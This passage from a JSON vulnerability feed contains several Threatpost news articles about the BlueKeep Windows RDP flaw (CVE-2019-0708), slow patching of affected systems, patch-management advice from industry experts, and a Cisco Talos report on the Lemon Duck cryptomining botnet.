entire hospital is even worse.\u201d\n", "modified": "2020-02-19T20:29:59", "published": "2020-02-19T20:29:59", "id": "THREATPOST:902F021868A194A6F02A30F8709AA730", "href": "https://threatpost.com/bluekeep-flaw-plagues-medical-devices/153029/", "type": "threatpost", "title": "BlueKeep Flaw Plagues Outdated Connected Medical Devices", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-10T12:13:11", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "Patch management is a thankless job. Data shows, despite best efforts, that 80 percent of enterprise applications have at least one unpatched vulnerability in them, according research by[ Veracode](<https://www.veracode.com/state-of-software-security-report>).\n\nIt is not for lack of trying that vulnerabilities persist. Last year 16,500 [vulnerabilities were reported](<https://www.cvedetails.com/browse-by-date.php>), making patching each one nearly an impossible task for any one company. Perhaps it shouldn\u2019t be a surprise that Windows patching times appear to be moving in the wrong direction. According to Edgescan, the average of 63 days to patch in 2017 to 81 days in 2018.\n\nWhat these statistics reveal is a process suffering under the weight of a shifting IT ecosystem that has ballooned to include a flood of bug submissions from a new crop of bounty programs, scrutinizing the growing army of chip-enabled gear.\n\nThe good news is that there\u2019s hope. Patching experts say there are concrete steps companies can take to avoid patch fatigue. Identifying the problems is an important first step.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/03103016/Veracode_Vulns_Numbers.png>)\n\nClick to Enlarge (courtesy Veracode)\n\n## Building a Better Patch Process\n\n\u201cOne of the biggest patching challenges is first identifying everything that needs to be patched,\u201d said Chris Goettl, director of product management and security for Ivanti. \u201cThe challenge becomes keeping a handle on how big a company\u2019s universe of devices is \u2014 and knowing what has been patched and what still needs to be.\u201d\n\nAdd in vulnerabilities related to software dependencies, such as the third-party code underlying software, and patching becomes even more arduous. Code repositories, open-source projects and small vendors poorly communicate bugs in their often complex library dependencies, he said.\n\n[Stagefright](<https://threatpost.com/stagefright-2-0-vulnerabilities-affect-1-billion-android-devices/114863/>), [Devil\u2019s Ivy](<https://threatpost.com/bad-code-library-triggers-devils-ivy-vulnerability-in-millions-of-iot-devices/126913/>) and the [Zip Slip flaw](<https://threatpost.com/zip-slip-flaw-affects-thousands-of-open-source-projects/132577/>) are just of few examples of vulnerabilities affecting thousands of open-source projects. And last month, VLC developer VideoLAN alerted customers [of a \u201chigh-risk\u201d bug](<https://threatpost.com/high-risk-vlc-media-player-bugs/147503/>) tied to a third-party component called MKV demuxer \u2014 a component responsible for multiplexing digital and analog files. The bug could allow an adversary to craft a malicious .MKV video file that could be used in an attack to gain control of the victim\u2019s PC, according to VideoLAN.\n\n\u201cWe assume a given developer is going to provide patches for their code. Obviously, they are going to fix any of vulnerabilities. But almost every product these days is based on other third-party components. There is Apache Struts, Microsoft .NET core and Java development kits. It\u2019s very important that the components are updated as well,\u201d said Todd Schell, senior product manager, security, for Ivanti.\n\nThese are vulnerabilities that are compiled into the code and aren\u2019t something found by regular IT staff, Schell said. Developers, not just IT and security operations staff, need to be aware \u2013 pushing companies to adopt a DevOps approach to security.\n\n## A Race to Zero\n\nGoettl also noted that there is a race by hackers and researchers alike to shrink the time between a zero-day bug discovery and the publishing of a proof-of-concept (PoC) exploit of the flaw.\n\nIn the case of the \u201cwormable\u201d vulnerability known as BlueKeep ([CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)), [Microsoft patched the bug on May](<https://threatpost.com/fearing-wannacry-level-danger-enterprises-wrestle-with-bluekeep/146727/>) 14, and by May 22 a [proof-of-concept (PoC) exploit](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) of the flaw was demonstrated. Other [PoCs followed](<https://threatpost.com/working-bluekeep-exploit-developed-by-dhs/145784/>) in the [subsequent months](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>). On Thursday, Palo Alto Networks published [three additional](<https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/>) ways to exploit system that have not been patched for BlueKeep.\n\nPoCs offer security professionals vital and needed clues on how to identify a threat and mitigate against it. But, if patching isn\u2019t part of the PoC discovery and fix, it could lead to catastrophic results \u2013 think [EternalBlue and WannaCry](<https://threatpost.com/tag/wannacry/page/3/>).\n\nAs of July, the number of systems that remain exposed and unpatched to BlueKeep is [close to 800,000](<https://threatpost.com/fearing-wannacry-level-danger-enterprises-wrestle-with-bluekeep/146727/>), according to BitSight.\n\n## Making Sense of CVSS Scores\n\nTyler Reguly, manager of security, researcher and development for Tripwire, points out that the sheer number of patches that face IT and security teams leads to patch fatigue. The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities and is meant to help with that; CVSS scores assign severity scores to vulnerabilities with the intent of giving security professionals the ability to prioritize responses.\n\nHowever, oftentimes the severity score is higher than the threat really warrants; and sometimes it\u2019s the other way around, Reguly said.\n\n\u201cWhat you end up with is a lot of people looking at these CVSS scores, confused, asking themselves \u2018what should I patch, when should I patch it,'\u201d he said.\n\nMatthew Howell, senior director of product for Flashpoint, recommends that when it comes to patch prioritization, IT needs to evaluate the threat variables of a bug as they relate to one\u2019s specific network. In a recent [blog post, he recommends](<https://www.flashpoint-intel.com/blog/a-clean-view-of-vulnerabilities-helps-prioritize-patching/>) that security teams ask themselves:\n\n * _ How likely the vulnerability is to be exploited in the wild?_\n * _ If the vulnerability is exploited in the wild, how likely it is to impact your organization?_\n * _ If the vulnerability is exploited at your organization, what impact it is likely to have? _\n\nThe CVSS score assigned to a vulnerability reflects severity, not risk, Howell wrote.\n\n## Automating the Patching Process\n\nReguly says one of the best antidotes to fend off patching fatigue is automating as much of the patching process as possible. \u201cYou really need to architect to automate. That includes patching software, but also the processes as well,\u201d he said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/25161620/Patch-Management.jpg>)That includes configuring orchestration tools such as Puppet to help automate the patching process. \u201cIf possible, some patch software supports APIs [and] can be used to tie in through an API for patch management and configuration management,\u201d Reguly said.\n\nHe said automation also includes patch validation and making sure patches and security updates are implemented properly. Lastly, he recommends determining if a software vendor\u2019s service-level agreement might also be leveraged to help with the patching process.\n\n## Driving a Stake in the Heart of a Check-Box Security Mentality\n\nJimmy Graham, senior director of vulnerability management, for Qualys, calls the process vulnerability management, not just patch management. He warns against focusing exclusively on patch management to the exclusion of the bigger security picture.\n\nHe promotes the idea of vulnerability management lifecycles that start with asset inventory, collecting vulnerability information locally, prioritizing vulnerabilities and then moving to patch management.\n\n\u201cPatch management is a cyclical process where you are patching systems based on the fact a patch was released by a vendor. Vulnerability management is there to make sure that patching was effective as well as the configuration management,\u201d Graham said.\n\n## Best Practices\n\nBest practices, according to Graham, include creating a patching cadence based on vendor releases. IT should also identify and prioritize patches based on the company\u2019s unique infrastructure, and then test and deploy the patches themselves. Follow-up is just as important, he said, such as documenting the process for each technology patched \u2014 from operating systems to databases.\n\nHe also recommends patching and updating \u201cgolden images\u201d (master software images used by IT for mass software deployment) at least quarterly. \u201cThat way all new systems are remediated before they go into production,\u201d he said.\n\nThe goal is to significantly reduce or eliminate one-off patching.\u201dIf you\u2019ve ever tried to figure out what version of Flash to deploy, then you aren\u2019t doing it right,\u201d Graham said.\n\n**[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/03103951/DevOps.jpg>)**\n\n## The DevSecOps Approach\n\nStill others advocate taking a DevSecOps approach to security \u2014 i.e., a blending of software development, IT operations and security practices into a streamlined system lifecycle.\n\n\u201cThere is a strong correlation between how many times an organization scans and how quickly they address their vulnerabilities,\u201d Veracode said in [its _State of Software Security_ report](<https://www.veracode.com/state-of-software-security-report>). \u201cDevOps, or agile-driven development teams, are scanning more often, and as a result, they are making incremental [security] improvements every time they test.\u201d\n\nVeracode asserts that once organizations hit 300 or more internal scans per year, companies are seeing the \u201cfix velocity going into overdrive.\u201d Therefore, DevSecOps in theory could be vital when it comes to spotting bugs early in the development process \u2013 making vulnerabilities easier, faster and less expensive it is to fix, [security experts say](<https://threatpost.com/how-to-solve-the-developer-vs-cybersecurity-team-battle/133759/>) .\n\nThere\u2019s a caveat to this though: The idea presupposes an unlikely harmonious relationship between developers and security teams. Often development teams are under pressure to deliver feature-rich applications on near impossible deadlines. Security teams, on the other hand, are under growing pressure to safeguard data.\n\n## Patching Landscape Moves to Cloud\n\nThings are changing in the patching landscape as more compute moves to the cloud. Applications such as Salesforce and Office 365 represent a growing number cloud-based solutions running on AWS, Google Compute and Microsoft Azure. As the move to cloud services grows, cloud providers share the responsibility for security with their customers, Schell said.\n\nThe Cloud Native Computing Foundation, the organization behind popular container project Kubernetes, has had to tackle a number of [vulnerabilities in its platform](<https://github.com/kubernetes/kubernetes>). One bug [found last month](<https://groups.google.com/forum/#!topic/kubernetes-security-announce/vUtEcSEY6SM>) could allow an adversary to access, modify or delete computing and storage resources configured across a cluster. Also last month there was an Azure update addressing a Kubernetes component that had a known vulnerability.\n\nThe shift from on-premise to off-premise (cloud) computing is a game changer for security teams, and it forces them to forfeit some control to platform providers, Schell said.\n\n\u201cIt\u2019s fully upon the shoulders of the [cloud] service provider to make sure the application is running with the most recent performance enhancements and security updates. And there is not much we can do as users,\u201d he said.\n\n_(A portion of this article is adopted from a previous Threatpost webinar \u201c[Streamlining Patch Management](<https://threatpost.com/streamlining-patch-management-expert-advice/146686/>)\u201c. In this 60-minute presentation, available on-demand, experts Todd Schell, senior product manager, security, for Ivanti; Tyler Reguly, manager of security R&amp;D, for Tripwire; and Jimmy Graham, senior directory, vulnerability management, for Qualys, are joined by Threatpost editor Tom Spring to discuss streamlining patch management and offer patching advice, tips and tricks.)_\n", "modified": "2019-09-03T18:17:11", "published": "2019-09-03T18:17:11", "id": "THREATPOST:472451689B2FA39FCB837D08B514FF91", "href": "https://threatpost.com/how-to-handle-patch-management/147909/", "type": "threatpost", "title": "How to Get a Handle on Patch Management", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-11T11:41:37", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "The nightmare vision of a \u201cmega-worm\u201d global BlueKeep infection could be closer to becoming reality as working exploits are now becoming available to the public, and there\u2019s evidence that adversaries are actively scanning for the vulnerability.\n\nResearchers weighed in with Threatpost about how enterprises can thwart the critical Windows remote code-execution (RCE) vulnerability, even if immediate patching is too large an ask.\n\n## Exploits Make an Appearance\n\nBy way of background, the BlueKeep vulnerability (CVE-2019-0708) RCE flaw exists in Remote Desktop Services and impacts older version of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it\u2019s wormable \u2013 and so it can self-propagate from machine to machine, setting up the scene for a WannaCry-level, fast-moving infection wave.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cBlueKeep is a use-after-free vulnerability, meaning that the program tries to use memory after it is supposed to have discarded it,\u201d according to a [May analysis](<https://news.sophos.com/en-us/2019/05/14/may-2019-patch-tuesday-addresses-critical-remote-desktop-dhcp-bugs/>) from security firm Sophos. \u201cThe vulnerability lies in termdd.sys, which is the RDP kernel driver. A user can exploit this by opening an RDP connection to a remote computer called a channel \u2013 in this case a default RDP channel called MS_T210 \u2013 and sending specially crafted data to it.\u201d\n\nSecurity researchers have said that creating an exploit has been difficult, often leading to crashing and DoSing the target machine rather than RCE. However, some [have been able to create](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) working exploits (including the [Department of Homeland Security](<https://threatpost.com/working-bluekeep-exploit-developed-by-dhs/145784/>)), but have kept mum on the details in order to protect the public.\n\nThat changed last week when an exploit went up for sale via a security firm that would allow an attacker to run code remotely on the compromised machine and then create a worm that uses RDP to exploit other machines without any human interaction.\n\nImmunity Inc. said via Twitter that it has added a working BlueKeep exploit module to its CANVAS automated exploitation platform, which is available as a subscription (albeit for an expensive monthly rate):\n\n> New Release \u2013 CANVAS 7.23: This release features a new module for the RDP exploit, BLUEKEEP. Check out our video demonstration here: <https://t.co/azCuJp1osI> [#bluekeep](<https://twitter.com/hashtag/bluekeep?src=hash&ref_src=twsrc%5Etfw>) [#cve20190708](<https://twitter.com/hashtag/cve20190708?src=hash&ref_src=twsrc%5Etfw>) [#exploit](<https://twitter.com/hashtag/exploit?src=hash&ref_src=twsrc%5Etfw>)\n> \n> \u2014 Immunity Inc. (@Immunityinc) [July 23, 2019](<https://twitter.com/Immunityinc/status/1153752470130221057?ref_src=twsrc%5Etfw>)\n\nDave Aitel, CTI at Immunity\u2019s parent company, Cyxtera, said via email that the company decided to release the exploit because \u201cit\u2019s important for organizations to understand their actual risk and determine if their defenses are effectively protecting them.\u201d\n\nWhen asked why a full RCE exploit in the tool and not just a scanner to find vulnerable systems, he added, \u201cOur objective is to help customers solve their risk problems. It\u2019s not just about BlueKeep \u2013 there will always be another vulnerability that comes along and puts you at risk. Many modern systems do anomaly detection on network traffic, or endpoint behavioral analysis to catch exploitation of flaws like BlueKeep. Testing these kinds of systems requires a working RCE exploit. Likewise, simply doing a demo to upper management of \u201chere is us hacking our systems\u201d is a common use for red teams as they gather support to replace or upgrade their systems. The end goal should be addressing the entirety of risk rather than focusing on any single exploit.\u201d\n\nHe said that it took about two months to develop the exploit, and that \u201cit\u2019s getting more stable all the time.\u201d The company plans to update it regularly.\n\nMeanwhile, on GitHub, proof-of-concept code detailing a workable exploit has appeared in at least two places, according to [researchers at Sophos](<https://nakedsecurity.sophos.com/2019/07/26/bluekeep-guides-make-imminent-public-exploit-more-likely/>). First, a series of Chinese-language slides that claim to explain how to exploit the vulnerability were posted. Then, a researcher published a Python PoC that works on Windows XP (but would probably crash Windows 7 or Server 2008 machines, he said). Sophos said that the latter posting doesn\u2019t include an executable shellcode payload, but that the information is enough to help threat actors get disturbingly far along the road to mounting a real-world campaign.\n\nThe firm Intezer at the same time has found that the bad guys are starting to actively scan for the vulnerability.\n\n\u201cWe have discovered a new version of WatchBog\u2014a cryptocurrency-mining botnet operational since late 2018\u2014that we suspect has compromised more than 4,500 Linux machines in newer campaigns taking place since early June,\u201d researchers there [explained last week](<https://www.intezer.com/blog-watching-the-watchbog-new-bluekeep-scanner-and-linux-exploits/>). \u201cAmong the new Linux exploits, this version of WatchBog implements a BlueKeep RDP protocol vulnerability scanner module, which suggests that WatchBog is preparing a list of vulnerable systems to target in the future or to sell to third-party vendors for profit.\u201d\n\nOverall, the tipping point on BlueKeep campaigns starting to appear in the wild appears to be approaching sooner rather than later, according to BitSight director of security research Dan Dahlberg.\n\n\u201cThe threat to these unpatched systems is continuing to grow, and the milestones achieved by both nefarious actors and those in the security community is demonstrating that the barrier to exploitability using this vulnerability is continuing to decrease,\u201d he told Threatpost. \u201cUnpatched systems not only remain a threat to those organizations operating them but also to their third parties, organizations and end-users that do business with them. Unfortunately with the escalation of exploit development and with the remediation pattern that we have been observing, we might not see widespread application of a patch before these systems and others end up being compromised.\u201d\n\n## Patching Slowly Rolls Out\n\nPatches for CVE-2019-0708 [appeared in May](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>). The BlueKeep concern is big enough that Microsoft even took the unusual step of deploying patches to Windows XP and Windows 2003, which are end-of-life and no longer supported by the computing giant. It has also issued multiple follow-on advisories urging administrators to patch. However, the patching process is going slowly.\n\nAs of July 2, approximately 805,665 systems remain online that are vulnerable to BlueKeep, according to a [recent status update](<https://threatpost.com/805k-windows-systems-open-bluekeep/146529/>) from the firm \u2013 down from 1 million in May.\n\nThe number of susceptible systems represents a decrease of 17.18 percent (167,164 systems) compared to May 31, including 92,082 systems which remain externally exposed that have been patched. This translates to an average decrease of 5,224 exposed vulnerable exposed systems per day, between patching, taking them offline and replacing them.\n\nIn other words, the security effort isn\u2019t going fast enough, according to researchers.\n\n\u201cThere is very little time from when an internet-facing endpoint is made available to when it starts to undergo attack,\u201d said Justin Fox, director of DevOps for NuData Security, speaking to Threatpost. \u201cWhile Microsoft has released a patch for BlueKeep, the rollout has been slow by organizations. Organizations need to react faster to patch vulnerabilities \u2013 software related issues are not new.\u201d\n\nRichard Gold, head of security engineering at Digital Shadows, told Threatpost that patching issues have a few root causes.\n\n\u201cI have spoken to some of our customers and one of the major issues that they have is simply finding all the machines that are vulnerable,\u201d he said. \u201cThen, secondarily, is the issue of taking those machines offline to patch, particularly in the cases where there is not a hot standby, a secondary system which can be used to cover for the primary.\u201d\n\nThere are alternative mechanisms to patching, including typical mitigating network technologies, Fox said.\n\n\u201cSimilar to VPN-based protection, if the endpoint must be internet-facing, securing it with RADIUS (multifactor authentication) and using firewall software to rate limit or restrict traffic access is crucial,\u201d he said. \u201cThese technologies can even be applied to internal-only VDI endpoints, mitigating internal threats. AWS provides these mitigations and there are easy-to-access services that software architects or engineers can use to build their VDI solutions.\u201d\n\nMike Weber, vice president at Coalfire, told Threatpost that taking systems away from being web-facing is a good first step.\n\n\u201cWe urge organizations to at a minimum block RDP access from the internet while they plan for the patch,\u201d he told Threatpost.\n\nHowever, he stressed that patching is not optional, thanks to the wormable aspect of the vulnerability.\n\n\u201cThis is not a problem that only impacts internet-exposed systems,\u201d he stressed. \u201cPatching internal systems is imperative to protecting your business. Delivering code to a workstation inside a network is a trivial task \u2013 it happens all the time via phishing attacks. If an attacker were to package this exploit into a phishing payload designed to search for vulnerable systems and exploit those, it could potentially result in compromise of your entire enterprise. Companies must learn from previous large-scale examples, such as NotPetya, that patching is an essential part of any security program.\u201d\n\n**_Interested in more on patch management? Don\u2019t miss our free _[_Threatpost webinar_](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)_, \u201c__Streamlining Patch Management,\u201d now available on-demand. Please join Threatpost editor Tom Spring and a panel of patch experts as they discuss the latest trends in Patch Management, how to find the right solution for your business and what the biggest challenges are when it comes to deploying a program. _[_Click here to listen (registration required)._](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)**\n", "modified": "2019-07-29T14:11:19", "published": "2019-07-29T14:11:19", "id": "THREATPOST:08D7AB11C0B2B0668D71ADCEEB94DB1B", "href": "https://threatpost.com/fearing-wannacry-level-danger-enterprises-wrestle-with-bluekeep/146727/", "type": "threatpost", "title": "Fearing WannaCry-Level Danger, Enterprises Wrestle with BlueKeep", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-22T21:49:04", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "For the past two months, security researchers have been sounding the alarm about BlueKeep, a critical remote code-execution vulnerability in Microsoft Windows that researchers said could lead to a \u201cmega-worm\u201d global infection. As of July 2, approximately 805,665 systems remain online that are vulnerable to BlueKeep, according to a status update.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/17155620/bluekeep.png>)\n\nSource: BitSight\n\nThe number of susceptible systems represents a decrease of 17.18 percent (167,164 systems) compared to May 31, including 92,082 systems which remain externally exposed that have been patched. This translates to an average decrease of 5,224 exposed vulnerable exposed systems per day, between patching, taking them offline and replacing them.\n\nThe BlueKeep vulnerability ([CVE-2019-0708](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>)) RCE flaw exists in Remote Desktop Services and impacts older version of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it\u2019s wormable \u2013 and so it can self-propagate from machine to machine, setting up the scene for a WannaCry-level, fast-moving infection wave.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe concern is big enough that Microsoft even took the unusual step of deploying patches to Windows XP and Windows 2003, which are end-of-life and no longer supported by the computing giant. It has also issued multiple follow-on advisories urging administrators to patch.\n\n## Patches Slowly Roll Out\n\nBitSight\u2019s analysis shows a mixed report card on how well organizations have closed that security hole, with a variable amount of progress made within each industry.\n\nBitSight found that the most responsive industries in mitigating BlueKeep have been legal, nonprofit/NGO and aerospace/defense with a 32.9 percent, 27.1 percent and 24.1 percent respective reduction in the number of organizations affected.\n\nConversely, the consumer goods, utilities and (ironically) technology industries have been the least responsive, with only 5.3 percent, 9.5 percent and 11.7 percent of organizations respectively having taken an.\n\n> **_Interested in more on patch management? Don\u2019t miss our free live _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)**_, \u201c_****_Streamlining Patch Management,\u201d on Wed., July 24, at 2:00 p.m. EDT._**\n\nIn terms of geography, China and the United States still have the highest number exposed systems.\n\nYet, China showed the highest absolute improvement by reducing the number of exposed vulnerable systems by 109,670, which represents a 23.9 percent decrease. The United States followed suit by showing 26,787 fewer vulnerable systems exposed as of July 2, representing a 20.3 percent decrease.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/17155817/bluekeep-2.png>)\n\nClick to enlarge. Source: BitSight.\n\nOther countries showing a notable reduction in exposed systems were Colombia (21.3 percent decrease), Latvia (20.7 percent decrease) and Guatemala (a 45.4 percent decrease).\n\nOn the flip side, South Korea actually showed an 14.5 percent increase in the time period of 3,430 vulnerable exposed systems, and Estonia with 146, a 32.2 percent increase.\n\nFausto Oliveira, principal security architect at Acceptto, told Threatpost that patching is easier said than done.\n\n\u201cSome companies have very rigid change-management intervals due to regulatory constraints, others have very rigid internal change-management procedures \u2013 and finally, because there are RDP servers (unfortunately) inside the organization that fall outside of the remit of corporate IT,\u201d he said via email. \u201cThe fact that these are older machines are no longer supported by Microsoft could be a factor in the slow patching, especially in legacy systems that have poor documentation, and/or sometimes are outside of the supervision of corporate IT. There are some false misconceptions on the market, like if the OS is going end-of-life, let\u2019s not spend money on it until we replace it, which sometimes could be years away.\u201d\n\n## Very Real Exploit Danger\n\nIn June, [a working exploit](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) for the flaw showed how an unauthenticated attacker could achieve full run of a victim machine in about 22 seconds. Reverse engineer Z\u01dd\u0279osum0x0 released a video showing an RCE exploit working on a Windows 2008 desktop, paired with a Mimikatz tool to harvest login credentials.\n\nAn [earlier proof-of-concept](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/>) (PoC) from McAfee showed a successful RCE exploit, but didn\u2019t include the credential-harvesting \u2013 so a mitigating factor in that exploit would be the need for an attacker to bypass network-level authentication protections.\n\n\u201cThe exploit is quite significant given the number of affected systems, which gives an attacker the ability not only of hijacking these machines, but to use them to further penetrate other systems and services inside the organization,\u201d Oliveira said. \u201cThe type of risks that organizations are facing are wide, just to name a few: once the exploit is in place the attacker can exflitrate data from the RDP server, obtain credentials, disrupt the operations of the organization or use the RDP server as a jumping point to access further resources inside the company.\u201d\n\n**_Interested in more on patch management? Don\u2019t miss our free live _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)**_, \u201c_****_Streamlining Patch Management,\u201d on Wed., July 24, at 2:00 p.m. EDT. Please join Threatpost editor Tom Spring and a panel of patch experts as they discuss the latest trends in Patch Management, how to find the right solution for your business and what the biggest challenges are when it comes to deploying a program. [Register and Learn More](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>) _**\n", "modified": "2019-07-17T20:55:43", "published": "2019-07-17T20:55:43", "id": "THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C", "href": "https://threatpost.com/805k-windows-systems-open-bluekeep/146529/", "type": "threatpost", "title": "Wormable BlueKeep Bug Still Threatens Legions of Windows Systems", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-13T20:42:53", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "Researchers are warning of a recent dramatic uptick in the activity of the Lemon Duck cryptocurrency-mining botnet, which targets victims\u2019 computer resources to mine the Monero virtual currency.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\nResearchers warn that Lemon Duck is \u201cone of the more complex\u201d mining botnets, with several interesting tricks up its sleeve. While the botnet has been active since at least the end of December 2018, researchers observed an increase in DNS requests connected with its command-and-control (C2) and mining servers since the end of August, in a slew of attacks centered on Asia (including ones targeting Iran, Egypt, Philippines, Vietnam and India).\n\n\u201cCisco Talos has identified activity in our endpoint telemetry associated with Lemon Duck cryptocurrency mining malware, affecting three different companies in the government, retail, and technology sectors,\u201d said researchers with Cisco Talos, in [Tuesday research](<https://blog.talosintelligence.com/2020/10/lemon-duck-brings-cryptocurrency-miners.html>). \u201cWe observed the activity spanning from late March 2020 to present.\u201d\n\nMore recent attacks have included less-documented modules that are loaded by the main PowerShell component \u2013 including a Linux branch and a module allowing further spread by sending [emails to victims with COVID-19 lures](<https://threatpost.com/cyberattackers-1-5m-covid-19-emails-per-day/154970/>).\n\nThreatpost has reached out to researchers for further information about how many victims have been targeted and the extent to which the botnet\u2019s operators have profited off of the cryptomining attacks.\n\n## **Lemon Duck**\n\nLemon Duck has at least 12 independent infection vectors \u2013 more than most malware. These capabilities range from Server Message Block (SMB) and Remote Desktop Protocol (RDP) password brute-forcing, sending emails with exploit attachments or targeting the [RDP BlueKeep flaw](<https://threatpost.com/critical-microsoft-remote-desktop-flaw-fixed-in-security-update/148982/>) (CVE-2019-0708) in Windows machines; or targeting vulnerabilities in Redis (an open-source, in-memory data structure store used as a database, cache and message broker) and YARN Hadoop (a resource-management and job-scheduling technology) in Linux machines.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/13155059/image18.jpg>)\n\nLemon Duck botnet August activity. Credit: Cisco Talos\n\nAfter the initial infection, a PowerShell loading script is downloaded, which utilizes the function \u201cbpu\u201d to disable Windows Defender real-time detection and put powershell.exe on the list of processes excluded from scanning.\n\n\u201cbpu\u201d also checks if the script is running with administrative privileges. If it is, the payload is downloaded and run using the Invoke-Expression cmdlet (a function that can be utilized for calling code within a script or building commands to be executed later). If not, it leverages existing system executables to launch the next stage.\n\n\u201cThis is a good starting point for analysis and retrieval of additional modules,\u201d said researchers. \u201cAlmost all PowerShell modules are obfuscated with four or five layers of obfuscation, likely generated by the Invoke-Obfuscation module. Although they are relatively easy to remove, they still slow down the analysis process and make detection using regular signatures more difficult.\u201d\n\nThese executable modules, which are downloaded and driven by the main module, communicates with the C2 server over HTTP.\n\n## **Modular Functionalities**\n\nThe modules include a main loader, which checks the level of user privileges and components relevant for mining, such as the type of the available graphic card (including GTX, [Nvidia](<https://threatpost.com/nvidia-windows-gamers-graphics-driver-bugs/156911/>), [GeForce](<https://threatpost.com/nvidia-geforce-experience-bug/143196/>), [AMD](<https://threatpost.com/amd-downplays-cpu-threat-opening-chips-to-data-leak-attacks/153516/>) and [Radeon](<https://threatpost.com/amd-radeon-cards-vmware-workstations/148406/>)). If these GPUs are not detected, the loader downloads and runs the commodity XMRig CPU-based mining script.\n\nOther modules include a main spreading module (with what researchers say include \u201ca rather ambitious piece of code\u201d containing more than 10,000 lines of coding), a Python-based module packaged using Pyinstaller, and a killer module designed to disable known competing mining botnets.\n\nLemon Duck also includes an email-spreading module. These spread emails using a mix of COVID-19-related subject lines and text, as well as other emotion-driven lures (such as an email subject \u201cWTF\u201d with the text \u201cWhat\u2019s wrong with you?are you out of your mind!!!!!!!\u201d). These emails contain an infected attachments sent using Outlook automation to every contact in the affected user\u2019s address book.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/13160429/image15.png>)\n\nAn example of an email sent by the Lemon Duck module. Credit: Cisco Talos\n\n## **Linux Branch**\n\nResearchers also shed light on a less documented Linux branch of the Lemon Duck malware. These Lemon Duck bash scripts are executed after the attacker successful compromises a Linux host (via Redis, YARN or SSH). There are two main bash scripts, said researchers: The first collects some data about the infected host and attempts to download a Linux version of the XMRig miner, before attempting to delete various system logs. The second attempts to terminate and remove competing cryptocurrency miners already present on the system.\n\n\u201cThe script also attempts to terminate and uninstall processes related to Alibaba and Tencent cloud security agents. The script seems to be shared between several Linux-based cryptomining botnets,\u201d said researchers.\n\nLemon Duck was previously spotted in 2020 in a campaign targeting printers, smart TVs and automated guided vehicles that depend on Windows 7. [Researchers in February warned that](<https://threatpost.com/lemon-duck-malware-targets-iot/152596/>) the processor-intensive mining efforts are taking their toll on gear and triggering equipment malfunctions along with exposing devices to safety issues, disruption of supply chains and data loss.\n\nDefenders can stomp out the threat of cryptocurrency attacks by monitoring system behavior to spot any resource-sucking threats.\n\n\u201cCryptocurrency-mining botnets can be costly in terms of the stolen computing cycles and power consumption costs,\u201d they said. \u201cWhile organizations need to be focused on protecting their most valuable assets, they should not ignore threats that are not particularly targeted toward their infrastructure.\u201d\n\n** [On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE 